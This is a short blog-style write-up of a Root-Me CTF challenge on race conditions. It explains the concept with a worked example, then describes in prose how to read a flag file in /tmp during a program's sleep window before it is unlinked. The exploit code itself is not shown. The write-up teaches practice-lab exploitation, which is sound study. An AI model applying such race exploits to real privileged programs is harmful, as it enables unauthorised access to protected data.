ELF x86 — Race Condition Rootme (App-system)
This challenge is based on the concept of Race condition. This condition is really cool for 2 reasons. It is fairly easy to understand and it is a critical vulnerability :).
Before jumping into the challenge directly, I want to introduce the concept of Race condition and some important terms related to it.
You won’t be needing these concepts here in this challenge but maybe you’ll need them in future CTF.
If you know the basic concept skip to the challenge directly.
From here I would be putting a lot of copied definitions.
First, what is Race condition?
A race condition occurs when multiple processes access and manipulate the same data concurrently, and the outcome of the execution depends on the particular order in which the access takes place.
Let me explain this with a diagram .
Let me take this easy example. Initially Z=10. Let 2 processes run simultaneously ie process A and process B run at the same time. So now there is confusion on what order should it execute. So for now let’s start with Process A. The value of Z=10 is copied into variable X . Let us continue with Process A itself. So “X++” is executed and now the value for X=11. Continuing with process A. We hit a sleep function. When a process sleeps it will jump to the next process which is free, ie process B here. Now the value of Z=10 is copied into variable Y . Continuing with Process B . “Y- -” is 9. Next Process B hits a sleep function, so we jump to Process A. Now the value of X=11 is copied into Z . Process A is done so we move to process B. Value of Y=9 is copied into Z. So final value of Z=9. Can you see the problem ????
The value of z=11 is lost when process B is executed. This is a typical race condition. Imagine when a privileged program has this problem. we can exploit this problem easily by running a parallel process.
Next what is Deadlock and Concurrency ?
We just saw an example for concurrency.
Concurrency is the execution of the multiple instruction sequences at the same time.
Deadlock is a situation where a set of processes are blocked because each process is holding a resource and waiting for another resource acquired by some other process.
2 easy concepts to understand . Now coming back to the challenge .
Challenge
Let us see the source code
Let us analyze the code. There is a flag getting stored in a file created in /tmp/tmp_file.txt. and this program doesn’t allow us to open a debugger. I tried to execute the program and then go to the /tmp, but it was too late because the program unlink’s the file in .25 seconds. So we use the concept discussed above.
We exploit the sleep function. When process A sleeps we get a chance to cat the file before we jump back to process A. So we write our exploit.
The exploit is too easy. But the concept is really important here. I hope you understood the Race Condition.
Do leave some claps and feel free to ask your doubts below in the comments. It might help someone too!
Goodbye :)
